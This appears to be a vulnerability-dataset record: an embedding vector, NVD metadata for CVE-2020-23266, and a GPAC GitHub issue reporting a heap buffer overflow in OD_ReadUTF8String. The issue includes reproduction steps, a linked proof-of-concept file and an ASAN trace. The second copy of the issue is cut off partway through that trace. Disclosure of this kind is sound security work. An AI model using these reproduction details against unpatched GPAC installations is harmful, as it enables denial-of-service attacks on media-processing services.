0.01452134270220995, -0.0027444283477962017, 0.0006889344658702612, -0.004214657936245203, 0.020613370463252068, 0.015313005074858665, -0.020884796977043152, -0.0012025722535327077, -0.0256347693502903, -0.01399356871843338, -0.020824480801820755, -0.005138263572007418, 0.03383789584040642, -0.03887437283992767, -0.007452932186424732, -0.0007355859270319343, 0.010163431987166405, -0.008866614662110806, -0.012500720098614693, -0.009522562846541405, -0.03703470155596733, -0.02157844416797161, 0.002538973232731223, -0.010608270764350891, 0.0020451268646866083, -0.01345825381577015, 0.005006319843232632, 0.007271980866789818, -0.0008750692359171808, -0.00337964273057878, -0.00020321681222412735, -0.012711829505860806, -0.009115422144532204, -0.0016700298292562366, -0.008384077809751034, -0.03083712048828602, -0.021261779591441154, -0.010510255582630634, -0.011136045679450035, -0.014687214978039265, 0.0027463131118565798, 0.013827696442604065, 0.00961303897202015, -0.009824148379266262, -0.0034305353183299303, -0.007795985788106918, 0.008663044311106205, -0.017597515136003494, 0.027368886396288872, -0.0009782681008800864, 0.003756624646484852, 0.00004432482455740683, -0.013277302496135235, -0.027776027098298073, -0.00815034843981266, -0.01991972327232361, -0.02076416276395321, -0.01441578846424818, -0.008097571320831776, -0.018743541091680527, -0.007437853142619133, 0.034410908818244934, 0.005428539589047432, -0.013088812120258808, 0.007260671351104975, -0.007584875915199518, -0.016285618767142296, -0.02593635581433773, 0.024126842617988586, -0.024488745257258415, 0.0013816386926919222, 0.01236500684171915, -0.02714269794523716, -0.016240380704402924, -0.0008067413000389934, -0.0010979598155245185, 0.00998248066753149, -0.020899876952171326, -0.007173965685069561, -0.010148352943360806, -0.009371770545840263, -0.0333251990377903, 0.0015409135958179832, 0.0035342054907232523, 0.012922939844429493, 0.0007930757128633559, -0.0022298479452729225, -0.007219203747808933, 0.00279343593865633, 0.002604945097118616, -0.0016002882039174438, 0.017959417775273323, 0.004180729389190674, 0.020537974312901497, -0.005684887059032917, -0.01485308725386858, -0.026056990027427673, 0.024368111044168472, -0.010276527144014835, 0.0009033429087139666, 0.0023749859537929296, 0.0018736000638455153, 0.005560483317822218, 0.005918615963310003, -0.0054247695952653885, 0.017491960898041725, -0.011475329287350178, -0.03160616382956505, -0.013533650897443295, -0.004391839262098074, 0.01937687024474144, -0.0019904645159840584, -0.0037490851245820522, -0.007524558808654547, 0.002900875872001052, -0.011196362785995007, 0.0012035147519782186, 0.0014174520038068295, 0.011234060861170292, -0.0065180170349776745, -0.02783634327352047, -0.009575340896844864, -0.018140370026230812, 0.034561701118946075, 0.02614746429026127, 0.009454706683754921, -0.0013448829995468259, -0.008467013947665691, -0.0022147686686366796, 0.006114646792411804, -0.014242376200854778, -0.01540348120033741, 0.009733673185110092, -0.01614990457892418, -0.01978401094675064, -0.004018627107143402, 0.014536422677338123, -0.005134493578225374, 0.017522118985652924, -0.007694200612604618, 0.0051721916534006596, 0.002086594933643937, 0.023267323151230812, 0.02757999673485756, -0.014543961733579636, 0.015237608924508095, 0.010389621369540691, -0.01948242448270321, -0.013134049251675606, -0.00882891658693552, -0.005191040690988302, 0.03362678736448288, 0.0013137819478288293, -0.010819381102919579, -0.0025201239623129368, -0.0013609046582132578, 0.012824924662709236, 0.024624457582831383, -0.007268211338669062, -0.006898768711835146, -0.013722141273319721, 0.009499943815171719, 0.006223971489816904, -0.005926155485212803, 0.0030102005694061518, -0.004410688299685717, 0.00263698841445148, -0.0066047231666743755, 0.003078057197853923, -0.0251974705606699, -0.0033966070041060448, -0.011807073839008808, -0.004489854443818331, -0.01729593053460121, 0.004776360932737589, -0.023614147678017616, 0.0034380750730633736, -0.0005715988227166235, -0.013081272132694721, -0.004535092506557703, -0.0010574342450127006, -0.010638429783284664, 0.016572125256061554, -0.0226339939981699, -0.006672579795122147, -0.0005353143205866218, 0.0024937354028224945, 0.023614147678017616, 0.014234837144613266, -0.005462467670440674, 0.008768599480390549, -0.015456258319318295, -0.0032816275488585234, 0.008225745521485806, -0.007833683863282204, -0.011000332422554493, 0.028560148552060127, 0.0013100121868774295, -0.010118194855749607, 0.022513359785079956, -0.0022166536655277014, -0.03688390925526619, -0.0012289610458537936, -0.004685885272920132, -0.03468233719468117, 0.005187271162867546, -0.019949883222579956, 0.005454928148537874, -0.015953874215483665, -0.004670805763453245, -0.012523339129984379, -0.013247144408524036, 0.04252355918288231, 0.004173189867287874, -0.0017736998852342367, -0.0033061313442885876, 0.004538862034678459, 0.005270207300782204, -0.0038263662718236446, -0.005960084032267332, 0.011128505691885948, 0.013111431151628494, -0.006205121986567974, -0.000013555149962485302, -0.0006031710654497147, 0.014785230159759521, -0.012199134565889835, 0.010065416805446148, 0.017672911286354065, 0.0256046112626791, -0.002768932143226266, 0.0021129834931343794, -0.02534826286137104, -0.010291606187820435, -0.0032043461687862873, -0.00042292659054510295, -0.0009895775001496077, -0.01364674512296915, -0.003766049165278673, -0.008248364552855492, 0.0016860516043379903, -0.013578888028860092, 0.0035869828425347805, 0.028545070439577103, -0.017823705449700356, 0.00231655384413898, -0.011603503488004208, 0.02545381896197796, 0.016949106007814407, -0.016421331092715263, 0.014528882689774036, -0.0034625788684934378, 0.02593635581433773, 0.007886461913585663, 0.01344317477196455, -0.02106574922800064, 0.008964629843831062, -0.002674686722457409, -0.014883245341479778, -0.006631111726164818, -0.007916620001196861, -0.001661547808907926, -0.006382303778082132, 0.0021619913168251514, 0.0021205232478678226, 0.01670783758163452, -0.001994234276935458, 0.012214213609695435, 0.006687658838927746, 0.0008962744614109397, 0.017371326684951782, -0.011588423512876034, 0.004014857113361359, -0.009432087652385235, -0.0012685441179201007, -0.01578800193965435, 0.0010018293978646398, -0.017778467386960983, 0.0027877811808139086, -0.015531654469668865, 0.0058206007815897465, -0.001741656451486051, 0.020100675523281097, 0.012659052386879921, 0.009899544529616833, -0.027791107073426247, -0.0003180784988217056, 0.00961303897202015, 0.017160216346383095, 0.007833683863282204, 0.016753075644373894, 0.014883245341479778, 0.00764519302174449, -0.006156114395707846, 0.012576116248965263, -0.00793169904500246, 0.0020828249398618937, -0.03190774843096733, -0.0023580219130963087, 0.0032948218286037445, 0.001423106761649251, -0.003498392179608345, 0.02099035307765007, 0.026931587606668472, 0.0016841667238622904, -0.004678345285356045, -0.011030490510165691, -0.01691894792020321, 0.0009344439022243023, 0.006974165327847004, 0.0033249803818762302, -0.009326532483100891, -0.01464951690286398, 0.024337952956557274, -0.0021657610777765512, -0.001850981148891151, 0.01673799753189087, -0.010382081381976604, -0.010208670049905777, 0.009793990291655064, 0.010419780388474464, -0.005311674904078245, 0.01217651553452015, 0.008663044311106205, -0.01428761426359415, 0.014461025595664978, 0.0066612702794373035, -0.0010338728316128254, 0.00547754717990756, 0.0027086150366812944, 0.013118970207870007, -0.0052362787537276745, -0.013805077411234379, -0.0031572235748171806, 0.0067366668954491615, 0.024111762642860413, 0.0023542519193142653, -0.02806253358721733, -0.012938018888235092, -0.006491628475487232, -0.00667634978890419, -0.0024447275791317225, 0.012003104202449322, 0.010118194855749607, 0.011746756732463837, 0.03989976644515991, 0.007924159988760948, 0.01082692015916109, -0.02340303733944893, 0.022950658574700356, -0.0027613923884928226, -0.009002327919006348, -0.012990796938538551, -0.005605720914900303, 0.0016408137744292617, 0.01948242448270321, 0.007219203747808933, -0.0200705174356699, 0.00010991378803737462, 0.005262667313218117, 0.011241600848734379, -0.006883689668029547, -0.004320212639868259, -0.001090420177206397, -0.00026153121143579483, 0.00890431273728609, 0.009070185013115406, -0.021699078381061554, -0.015757843852043152, -0.01743164286017418, -0.002765162382274866, -0.010208670049905777, -0.00442199781537056, -0.020311785861849785, 0.0013684442965313792, 0.01278722658753395, 0.03214901685714722, -0.021774474531412125, 0.010728904977440834, 0.026841111481189728, -0.015591971576213837, -0.03106330893933773, -0.014249916188418865, -0.0011073843343183398, -0.0032910520676523447, -0.011377314105629921, 0.02908792346715927, -0.008655504323542118, 0.018291162326931953, -0.0018858519615605474, 0.006220201496034861, 0.009281294420361519, 0.0016926487442106009, 0.0034569241106510162, -0.005583101883530617, -0.02329748123884201, 0.004165649879723787, 0.000479238253319636, -0.018336400389671326, 0.005918615963310003, -0.007385075557976961, 0.020598292350769043, 0.019030047580599785, 0.005481317173689604, -0.0277609471231699, -0.018487192690372467, -0.002942343708127737, -0.023568909615278244, -0.011573344469070435, 0.010645968839526176, 0.015086815692484379, 0.00316853285767138, -0.006906308699399233, -0.01012573391199112, -0.013563808985054493, 0.006808293052017689, -0.004060095176100731, -0.0056321099400520325, -0.008052333258092403, -0.002900875872001052, -0.0028028604574501514, -0.008067413233220577, 0.008474553003907204, 0.02963077835738659, 0.010480097495019436, -0.014317773282527924, -0.01514713279902935, -0.041829913854599, -0.0016436411533504725, 0.015516575425863266, -0.002399489749222994, -0.015132053755223751, 0.0027858964167535305, -0.04110610857605934, 0.016828471794724464, 0.004323982633650303, -0.027745869010686874, -0.004433307331055403, 0.010193591006100178, -0.002408914500847459, -0.00857256818562746, 0.006502937991172075, 0.0067819044925272465, 0.0247601717710495, 0.0016200797399505973, -0.02255859784781933, 0.012191594578325748, 0.010140812955796719, 0.002808515215292573, 0.004437076859176159, -0.025152232497930527, 0.024488745257258415, 0.015757843852043152, 0.0023976049851626158, 0.0038376757875084877, -0.013586428016424179, -0.03471249341964722, 0.016949106007814407, -0.004109102766960859, 0.011965406127274036, -0.00483667803928256, -0.011995564214885235, 0.015109434723854065, 0.0055114757269620895, 0.007388845551759005, 0.0010894776787608862, 0.007347377482801676, -0.012357466854155064, -0.0047198133543133736, 0.0002572901430539787, 0.015230068936944008, 0.027353806421160698, -0.01835147850215435, -0.0016163099789991975, 0.00807495228946209, 0.0030328193679451942, 0.01699434407055378, 0.008964629843831062, -0.002143142046406865, -0.017491960898041725, -0.02611730620265007, -0.02191018871963024, 0.0018019735580310225, -0.0007770539377816021, -0.024096684530377388, 0.0033212106209248304, -0.014031266793608665, 0.010977713391184807, -0.00295742298476398, -0.012078500352799892, -0.003996008075773716, -0.002861292799934745, 0.02025146782398224, -0.003179842373356223, 0.011279298923909664, -0.011890009045600891, 0.007211663760244846, -0.0010979598155245185, -0.022754628211259842, -0.0064614699222147465, 0.016391173005104065, -0.003445614594966173, -0.014129281975328922, -0.009205898270010948, -0.02893713116645813, 0.005813061259686947, -0.024714933708310127, 0.01182969193905592, -0.007611264940351248, 0.0036642642226070166, 0.0033325201366096735, 0.007373766042292118, 0.02494112215936184, 0.013232065364718437, 0.0014824813697487116, -0.00046745757572352886, 0.009228517301380634, 0.013609047047793865, 0.0016474109143018723, -0.008663044311106205, -0.0015107550425454974, -0.01289278082549572, 0.0061975824646651745, 0.0040110875852406025, 0.008542410098016262, 0.01850227266550064, -0.004704734310507774, 0.011113426648080349, -0.0002502217539586127, -0.0002989937784150243, 0.011731676757335663, -0.000009910500921250787, 0.009507483802735806, 0.0007926044636406004, 0.007339837960898876, 0.01991972327232361, 0.004290054086595774, -0.011513027362525463, 0.007758287712931633, 0.009914624504745007, -0.003153453581035137, -0.005119414534419775, 0.007091029547154903, 0.011497948318719864, 0.01245548203587532, 0.009507483802735806, 0.000997117138467729, 0.03453154116868973, 0.020749084651470184, -0.02153320610523224, 0.004682115279138088, -0.010412240400910378, -0.01519991084933281, 0.006502937991172075, -0.028047453612089157, 0.00903248693794012, 0.022769708186388016, 0.008565029129385948, 0.0016313892556354403, -0.016089588403701782, -0.004052555654197931, 0.008474553003907204, 0.019904645159840584, -0.0401410348713398, -0.006476548966020346, -0.02073400467634201, 0.0016436411533504725, -0.009997560642659664, -0.015252687968313694, 0.0007459529442712665, -0.007894000969827175, -0.009665816091001034, 0.0010367002105340362, -0.006314447149634361, -0.005967623554170132, 0.018803857266902924, 0.004765051417052746, 0.0056999665684998035, 0.019542742520570755, 0.018110210075974464, -0.018230844289064407, 0.017823705449700356, -0.014053885824978352, 0.02183479256927967, -0.006714047864079475, -0.027534758672118187, -0.003662379225715995, 0.0038829136174172163, -0.016421331092715263, -0.017130058258771896, 0.0062654390931129456, -0.015833240002393723, 0.007780906744301319, 0.013111431151628494, 0.007550947833806276, 0.002410799264907837, -0.00017034870688803494, -0.01776338741183281, 0.015652289614081383, 0.004682115279138088, -0.006966625805944204, 0.003686883021146059, 0.0035285507328808308, -0.0036171413958072662, 0.010932475328445435, 0.003245814237743616, 0.0066612702794373035, 0.007283290382474661, 0.017718149349093437, -0.0017652177484706044, -0.0008001441019587219, -0.0192260779440403, -0.012900320813059807, -0.020975273102521896, 0.017491960898041725, 0.004007317591458559, 0.012990796938538551, -0.02252843976020813, -0.004810289014130831, -0.002569131786003709, 0.007833683863282204, -0.011988025158643723, -0.017748307436704636, 0.0016832242254167795, -0.016979265958070755, -0.006827142555266619, -0.004772590938955545, -0.012545958161354065, -0.006303137633949518, -0.00720789423212409, -0.02083956077694893, 0.004542632028460503, -0.006099567282944918, 0.015132053755223751, 0.00105083710514009, 0.01919591799378395, 0.02109590731561184, 0.018004655838012695, -0.019768930971622467, -0.012764607556164265, 0.0015343163395300508, -0.012621354311704636, 0.011656280606985092, -0.018999887630343437, -0.0030799421947449446, 0.014785230159759521, 0.013752300292253494, 0.0047952099703252316, 0.02150304801762104, -0.006555715575814247, -0.0022336177062243223, 0.0029593079816550016, -0.012847543694078922, -0.0036020621191710234, 0.006359684746712446, 0.01652688719332218, -0.00030535535188391805, -0.021261779591441154, 0.012922939844429493, -0.009417007677257061, -0.006631111726164818, 0.010721365921199322, 0.012478101067245007, -0.0038942231331020594, 0.020718926563858986, 0.027610154822468758, 0.004384299740195274, 0.011158664710819721, -0.004041246138513088, -0.009515023790299892, -0.00076574448030442, 0.0011601618025451899, 0.012538418173789978, 0.014189599081873894, 0.01335269957780838, -0.018562588840723038, 0.004561481066048145, 0.004418227821588516, -0.0010178511729463935, -0.007607494946569204, 0.015953874215483665, 0.006469009444117546, -0.012606275267899036, 0.00954518187791109, -0.0049158441834151745, 0.015727685764431953, -0.011143585667014122, 0.0008689432870596647, -0.0014862511307001114, -0.016134826466441154, 0.026207782328128815, 0.027956977486610413, -0.015207449905574322, -0.008451933972537518, -0.007124958094209433, -0.00793169904500246, 0.002182725351303816, -0.028469674289226532, 0.017491960898041725, 0.004640647210180759, -0.0005975163076072931, 0.0002129947824869305, -0.007615034468472004, 0.001743541331961751, 0.005036478396505117, 0.0035342054907232523, -0.012764607556164265, 0.019512584432959557, 0.025740325450897217, -0.013118970207870007, 0.010842000134289265, 0.00934161152690649, -0.029736332595348358, -0.01970861479640007, 0.01981416903436184, -0.0025069296825677156, 0.00014937907690182328, -0.010781683027744293, 0.006955316290259361, -0.007539638318121433, 0.007618804462254047, -0.023312561213970184, 0.0003604889498092234, -0.021699078381061554, -0.020779242739081383, -0.01901496760547161, -0.019844327121973038, -0.02406652458012104, 0.015607050620019436, 0.005786672234535217, 0.010962634347379208, -0.024096684530377388, -0.006378533784300089, -0.001556935254484415, -0.006239050533622503, 0.02714269794523716, -0.012221753597259521, -0.002505044685676694, 0.01596895419061184, -0.029314113780856133, -0.00008811952284304425, 0.015335624106228352, 0.014461025595664978, 0.00343430507928133, 0.018999887630343437, -0.009718593209981918, 0.004222197458148003, -0.018547510728240013, -0.010932475328445435, 0.010419780388474464, 0.000918893376365304, 0.02417208068072796, -0.020447498187422752, -0.0002803803072310984, 0.0051608821377158165, 0.021231621503829956, 0.017386404797434807, 0.001929204910993576, -0.0017143252771347761, 0.0062088919803500175, 0.006570794619619846, 0.013578888028860092, -0.022106219083070755, 0.005978933069854975, -0.010985252447426319, 0.009236056357622147, 0.0054247695952653885, -0.018653064966201782, -0.0034154560416936874, -0.006729126907885075, 0.006073178723454475, 0.00027613923884928226, 0.009070185013115406, 0.016059428453445435, 0.0049158441834151745, 0.01011065486818552, -0.010321764275431633, -0.026072068139910698, 0.01589355804026127, -0.019075283780694008, -0.004124182276427746, -0.018834015354514122, -0.01287770178169012, -0.039326753467321396, -0.008813836611807346, 0.01421221811324358, -0.0029781570192426443, -0.024443507194519043, -0.013337619602680206, 0.008542410098016262, -0.009462245739996433, 0.02037210203707218, -0.010050337761640549, 0.007083490025252104, -0.0018066858174279332, -0.009175739251077175, 0.018834015354514122, 0.017235612496733665, 0.015591971576213837, 0.01032930426299572, -0.007196584716439247, -0.0014589199563488364, -0.020779242739081383, -0.01652688719332218, 0.008301141671836376, 0.0021619913168251514, -0.016180062666535378, 0.005764053203165531, -0.016285618767142296, -0.010940015316009521, 0.019075283780694008, 0.0234482754021883, 0.012613814324140549, 0.013526110909879208, 0.010042797774076462, 0.000533429381903261, 0.005330524407327175, 0.01886417530477047, 0.0058319102972745895, 0.007720589637756348, -0.030264107510447502, 0.00935669057071209, 0.0068497611209750175, -0.024232396855950356, -0.010412240400910378, 0.05341079831123352, 0.01258365623652935, 0.019753852859139442, 0.014031266793608665, 0.00045120023423805833, 0.0010885352967306972, -0.013933251611888409, -0.007648963015526533, -0.012975716963410378, 0.010268987156450748, 0.011354695074260235, -0.0006493513355962932, 0.010857079178094864, -0.019105443730950356, -0.007049561478197575, 0.005138263572007418, -0.0011328306281939149, -0.011897549033164978, -0.009318992495536804, -0.01948242448270321, -0.008316220715641975, -0.012282070703804493, 0.01688878983259201, -0.011769374832510948, -0.0034003767650574446, 0.01025390811264515, -0.00048135878751054406, -0.0028650625608861446, -0.0005753686418756843, -0.01691894792020321, 0.05389333516359329, -0.01611974649131298, -0.0045087034814059734, -0.0011912628542631865, 0.00939438957720995, 0.00925113633275032, 0.00893447082489729, 0.011905089020729065, 0.0020017740316689014, -0.004471005406230688, 0.005978933069854975, 0.009967401623725891, -0.014905864372849464, 0.008678123354911804, 0.010887237265706062, -0.003260893514379859, 0.006073178723454475, -0.015064196661114693, 0.017114978283643723, 0.009620578028261662, 0.006755515933036804, 0.007946779020130634, -0.011007871478796005, 0.015531654469668865, -0.008097571320831776, 0.005334293935447931, -0.011211441829800606, -0.012259451672434807, -0.010163431987166405, -0.01250826008617878, -0.01214635744690895, -0.007430313620716333, -0.01773322932422161, -0.003245814237743616, -0.028107771649956703, -0.00006744441634509712, -0.002305244328454137, 0.012342387810349464, -0.004354141186922789, 0.027022063732147217, 0.00968843512237072, 0.0035040469374507666, -0.01563720963895321, 0.004090253729373217, -0.018261004239320755, -0.021955426782369614, 0.019437186419963837, -0.0024522673338651657, -0.00002590278018033132, 0.008489632979035378, 0.009401928633451462, -0.001984809758141637, 0.0011394277680665255, -0.008338839747011662, -0.002067745663225651, -0.01223683264106512, -0.004716043826192617, -0.00784122385084629, -0.029314113780856133, 0.009997560642659664, 0.01194278709590435, 0.011105886660516262, -0.03416964039206505, -0.005017629358917475, 0.004825368523597717, 0.007155116647481918, 0.017627673223614693, -0.004063865169882774, -0.000757733650971204, -0.0018048009369522333, 0.011113426648080349, 0.016617363318800926, -0.026072068139910698, 0.0047085038386285305, 0.017130058258771896, -0.00441445829346776, 0.02852999046444893, -0.0025502825155854225, -0.00752832880243659, 0.0030422441195696592, 0.01930147409439087, -0.00225812173448503, -0.01806497387588024, 0.011852310970425606, 0.01535070315003395, 0.003999778069555759, -0.002143142046406865, 0.005010089371353388, 0.017884021624922752, 0.009092804044485092, -0.004391839262098074, -0.0029725022614002228, 0.027941899374127388, 0.023131610825657845, 0.008504712022840977, -0.005145803093910217, -0.012063421308994293, 0.02640381269156933, 0.0016917063621804118, 0.00010885352821787819, 0.003962079994380474, -0.023433195427060127, 0.016315776854753494, 0.005911076441407204, -0.009115422144532204, 0.011837231926620007, -0.004580330103635788, 0.022287171334028244, 0.01540348120033741, -0.005692427046597004, -0.0003633163287304342, 0.041890230029821396, -0.014551501721143723, -0.0017529658507555723, -0.026358574628829956, 0.019241156056523323, 0.0003124237700831145, 0.009952322579920292, -0.008632885292172432, -0.013578888028860092, -0.0013250914635136724, 0.016496729105710983, 0.019768930971622467, 0.006815833039581776, -0.01492848340421915, -0.0058884574100375175, 0.000691761786583811, 0.02234748750925064, -0.008444394916296005, -0.000986750121228397, 0.0025182391982525587, -0.0007511364528909326, -0.0012864507734775543, 0.01146778929978609, -0.003658609464764595, 0.0003442316083237529, 0.004339061677455902, -0.002834904007613659, 0.011497948318719864, -0.0025370882358402014, -0.015154672786593437, -0.010638429783284664, -0.01604435034096241, -0.0031195252668112516, 0.01181461289525032, 0.007758287712931633, 0.015169751830399036, -0.0209149569272995, 0.0011865505948662758, 0.013088812120258808, 0.008881693705916405, 0.012063421308994293, -0.009552721865475178, 0.015214989893138409, 0.0537726990878582, -0.016602283343672752, 0.0003619026392698288, 0.002993236295878887, 0.018185608088970184, 0.01450626365840435, -0.0036963075399398804, -0.009236056357622147, 0.014543961733579636, -0.00934161152690649, -0.007735668681561947, 0.027097459882497787, 0.01586339809000492, -0.0028499832842499018, 0.03857278823852539, -0.016421331092715263, -0.005560483317822218, -0.021126065403223038, -0.012372545897960663, 0.013812617398798466 ]
336
CVE-2020-23266
2021-09-22T00:15:08.567000
An issue was discovered in gpac 0.8.0. The OD_ReadUTF8String function in odf_code.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted media file.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1481" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/1481
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
- [ y] I looked for a similar issue and couldn't find any. - [ y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 **Describe the bug** A heap-based buffer overflow was discovered in libgpac. The issue is being triggered in the function OD_ReadUTF8String() at odf_code.c **To Reproduce** Steps to reproduce the behavior: 1. Compile according to the default configuration ```bash $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` 2. execute command ```bash MP4Box -hint $poc ``` [poc](https://github.com/14isnot40/vul_discovery/blob/master/OD_ReadUTF8String_hbo) can be found here. **Expected behavior** An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process the file. **Screenshots** ASAN Reports ```bash ==42612==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef51 at pc 0x7ffff6eda20b bp 0x7fffffff8b60 sp 0x7fffffff8308 READ of size 2 at 0x60200000ef51 thread T0 #0 0x7ffff6eda20a in __interceptor_strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7020a) #1 0x79532f in OD_SizeUTF8String odf/odf_code.c:49 #2 0x79532f in gf_odf_size_sup_cid odf/odf_code.c:3208 #3 0x79739d in gf_odf_desc_size odf/odf_codec.c:364 #4 0xac28c0 in iods_Size isomedia/box_code_base.c:2818 #5 0x6aa2f7 in gf_isom_box_size_listing isomedia/box_funcs.c:1588 #6 0x6aa2f7 in gf_isom_box_size isomedia/box_funcs.c:1601 #7 0xac6157 in moov_Size isomedia/box_code_base.c:3833 #8 0x6aa2f7 in gf_isom_box_size_listing isomedia/box_funcs.c:1588 #9 0x6aa2f7 in gf_isom_box_size isomedia/box_funcs.c:1601 #10 0x6e1599 in GetMoovAndMetaSize isomedia/isom_store.c:352 #11 0x6e7a1e in WriteInterleaved isomedia/isom_store.c:1356 #12 0x6e8be9 in WriteToFile isomedia/isom_store.c:1498 #13 0x6c9001 in gf_isom_write isomedia/isom_read.c:483 #14 0x6c9392 in gf_isom_close isomedia/isom_read.c:507 #15 0x429a8e in mp4boxMain (/usr/local/bin/MP4Box+0x429a8e) #16 0x7ffff615e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x41d668 in _start (/usr/local/bin/MP4Box+0x41d668) 0x60200000ef51 is located 0 bytes to the right of 1-byte region [0x60200000ef50,0x60200000ef51) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x79525c in OD_ReadUTF8String odf/odf_code.c:40 #2 0x79525c in gf_odf_read_sup_cid odf/odf_code.c:3197 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_strlen Shadow bytes around the buggy address: 0x0c047fff9d90: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 01 fa 0x0c047fff9da0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00 0x0c047fff9db0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9dc0: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 01 fa 0x0c047fff9dd0: fa fa 00 00 fa fa 01 fa fa fa fd fd fa fa fd fa =>0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa[01]fa fa fa 01 fa 0x0c047fff9df0: fa fa fd fd fa fa 00 00 fa fa 00 04 fa fa 00 00 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==42612==ABORTING [Inferior 1 (process 42612) exited with code 01] ``` **System (please complete the following information):** - OS version : Ubuntu 16.04 - GPAC Version : GPAC 0.8.0-e10d39d-master branch
Heap-buffer-overflow in OD_ReadUTF8String() odf_code.c
https://api.github.com/repos/gpac/gpac/issues/1481/comments
1
2020-05-12T18:18:19
2020-06-11T15:01:32Z
https://github.com/gpac/gpac/issues/1481
616,861,182
1,481
true
This is a GitHub Issue repo:gpac owner:gpac Title : Heap-buffer-overflow in OD_ReadUTF8String() odf_code.c Issue date: --- start body --- - [ y] I looked for a similar issue and couldn't find any. - [ y] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ y] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 **Describe the bug** A heap-based buffer overflow was discovered in libgpac. The issue is being triggered in the function OD_ReadUTF8String() at odf_code.c **To Reproduce** Steps to reproduce the behavior: 1. Compile according to the default configuration ```bash $ CC="gcc -fsanitize=address -g" CXX="g++ -fsanitize=address -g" ./configure --static-mp4box $ make ``` 2. execute command ```bash MP4Box -hint $poc ``` [poc](https://github.com/14isnot40/vul_discovery/blob/master/OD_ReadUTF8String_hbo) can be found here. **Expected behavior** An attacker can exploit this vulnerability by submitting a malicious media file that exploits this issue. This will result in a Denial of Service (DoS) and potentially Information Exposure when the application attempts to process the file. **Screenshots** ASAN Reports ```bash ==42612==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000ef51 at pc 0x7ffff6eda20b bp 0x7fffffff8b60 sp 0x7fffffff8308 READ of size 2 at 0x60200000ef51 thread T0 #0 0x7ffff6eda20a in __interceptor_strlen (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x7020a) #1 0x79532f in OD_SizeUTF8String odf/odf_code.c:49 #2 0x79532f in gf_odf_size_sup_cid odf/odf_code.c:3208 #3 0x79739d in gf_odf_desc_size odf/odf_codec.c:364 #4 0xac28c0 in iods_Size isomedia/box_code_base.c:2818 #5 0x6aa2f7 in gf_isom_box_size_listing isomedia/box_funcs.c:1588 #6 0x6aa2f7 in gf_isom_box_size isomedia/box_funcs.c:1601 #7 0xac6157 in moov_Size isomedia/box_code_base.c:3833 #8 0x6aa2f7 in 